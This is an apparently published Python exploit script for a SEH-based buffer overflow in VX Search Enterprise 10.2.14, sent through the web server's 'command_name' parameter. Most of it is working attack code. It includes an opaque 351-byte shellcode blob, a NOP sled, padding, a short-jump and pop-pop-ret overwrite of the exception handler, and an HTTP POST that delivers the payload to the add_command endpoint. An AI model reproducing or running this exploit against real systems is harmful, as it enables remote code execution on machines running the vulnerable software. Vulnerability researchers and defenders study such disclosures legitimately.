VX Search 10.2.14 - 'command_name' Buffer Overflow
Source: @wolfieroot  Author: W01fier00t  Published: 2017-12-06
#!/usr/bin/python
 
 
print "*** VX Search Enterprise v10.2.14 Buffer Overflow (SEH) ***\n"
 
# Exploit Title     : VX Search Enterprise v10.2.14 Buffer Overflow (SEH)
# Discovery by      : W01fier00t
# Twitter           : @wolfieroot
# Discovery Date    : 22/11/2017
# Software Link     : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe
# Tested Version    : 10.2.14
# Tested on OS      : Windows 7 Home Edition sp1
# You will need to enable the web server for this to work.
# You will also need to log in to the VX Search web page for this to work
# (the sid in the URL below comes from that logged-in session).
 
import urllib
import urllib2
import socket
 
#Bad chars \x00\x0a\x0d
#Payload size: 351 bytes
shellcode = (
"\xdd\xc6\xb8\x4a\xec\xd2\xea\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
"\x52\x83\xc5\x04\x31\x45\x13\x03\x0f\xff\x30\x1f\x73\x17\x36"
"\xe0\x8b\xe8\x57\x68\x6e\xd9\x57\x0e\xfb\x4a\x68\x44\xa9\x66"
"\x03\x08\x59\xfc\x61\x85\x6e\xb5\xcc\xf3\x41\x46\x7c\xc7\xc0"
"\xc4\x7f\x14\x22\xf4\x4f\x69\x23\x31\xad\x80\x71\xea\xb9\x37"
"\x65\x9f\xf4\x8b\x0e\xd3\x19\x8c\xf3\xa4\x18\xbd\xa2\xbf\x42"
"\x1d\x45\x13\xff\x14\x5d\x70\x3a\xee\xd6\x42\xb0\xf1\x3e\x9b"
"\x39\x5d\x7f\x13\xc8\x9f\xb8\x94\x33\xea\xb0\xe6\xce\xed\x07"
"\x94\x14\x7b\x93\x3e\xde\xdb\x7f\xbe\x33\xbd\xf4\xcc\xf8\xc9"
"\x52\xd1\xff\x1e\xe9\xed\x74\xa1\x3d\x64\xce\x86\x99\x2c\x94"
"\xa7\xb8\x88\x7b\xd7\xda\x72\x23\x7d\x91\x9f\x30\x0c\xf8\xf7"
"\xf5\x3d\x02\x08\x92\x36\x71\x3a\x3d\xed\x1d\x76\xb6\x2b\xda"
"\x79\xed\x8c\x74\x84\x0e\xed\x5d\x43\x5a\xbd\xf5\x62\xe3\x56"
"\x05\x8a\x36\xf8\x55\x24\xe9\xb9\x05\x84\x59\x52\x4f\x0b\x85"
"\x42\x70\xc1\xae\xe9\x8b\x82\x10\x45\x93\x4a\xf9\x94\x93\x74"
"\x98\x11\x75\xe2\x4a\x74\x2e\x9b\xf3\xdd\xa4\x3a\xfb\xcb\xc1"
"\x7d\x77\xf8\x36\x33\x70\x75\x24\xa4\x70\xc0\x16\x63\x8e\xfe"
"\x3e\xef\x1d\x65\xbe\x66\x3e\x32\xe9\x2f\xf0\x4b\x7f\xc2\xab"
"\xe5\x9d\x1f\x2d\xcd\x25\xc4\x8e\xd0\xa4\x89\xab\xf6\xb6\x57"
"\x33\xb3\xe2\x07\x62\x6d\x5c\xee\xdc\xdf\x36\xb8\xb3\x89\xde"
"\x3d\xf8\x09\x98\x41\xd5\xff\x44\xf3\x80\xb9\x7b\x3c\x45\x4e"
"\x04\x20\xf5\xb1\xdf\xe0\x05\xf8\x7d\x40\x8e\xa5\x14\xd0\xd3"
"\x55\xc3\x17\xea\xd5\xe1\xe7\x09\xc5\x80\xe2\x56\x41\x79\x9f"
"\xc7\x24\x7d\x0c\xe7\x6c")
 
# 0x1001a136 : pop edi # pop esi # ret 0x04 |  {PAGE_EXECUTE_READ} [libspp.dll]
cmdname = "\x90" * 16                 # NOP sled
cmdname += shellcode                  # 351-byte payload
cmdname += "A" * 157                  # padding up to the SEH record
cmdname += "\xEB\x06"                 # nSEH: short jump forward 6 bytes
cmdname += "B" * 2                    # filler completing the 4-byte nSEH
cmdname += "\x36\xa1\x01\x10"         # SEH handler: 0x1001a136 (little-endian)
 
print " [*] Sending payload!..."
url = 'http://127.0.0.1/add_command?sid=f3fdf2603e9ac8f518db9452fee62110'
values = {'command_name' : cmdname}
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
 
try:
    response = urllib2.urlopen(req, timeout=1)
except socket.timeout:
    pass  # no response is expected back; a timeout is fine
 
print " [*] DONE! :D\n"
 